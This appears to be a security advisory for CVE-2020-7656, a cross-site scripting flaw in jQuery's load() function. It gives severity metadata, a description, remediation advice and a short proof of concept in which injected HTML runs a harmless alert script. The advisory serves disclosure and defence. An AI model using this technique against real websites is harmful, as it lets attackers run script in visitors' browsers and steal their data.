#VU28228 Cross-site scripting in jQuery - CVE-2020-7656
Published: May 25, 2020
Vulnerability identifier: #VU28228
Vulnerability risk: Medium
CVSSv4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P/U:Green
CVE-ID: CVE-2020-7656
CWE-ID: CWE-79
Exploitation vector: Remote access
Exploit availability:
No public exploit available
Vulnerable software:
jQuery
jQuery
Software vendor:
The jQuery Team
The jQuery Team
Description
The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.
The vulnerability exists due to insufficient sanitization of user-supplied data within the load() function. A remote attacker can pass specially crafted HTML code to the application and execute it in browser in security context of the affected website.
Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.
PoC:
index.html:
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
</head>
<body>
<div id="mydiv"></div>
<script>
$("#mydiv").load('inject.html #himom');
</script>
</body>
</html>inject.html:
<div id="himom"><script>alert('Arbitrary Code Execution');</script ></div>Remediation
Install update from vendor's website.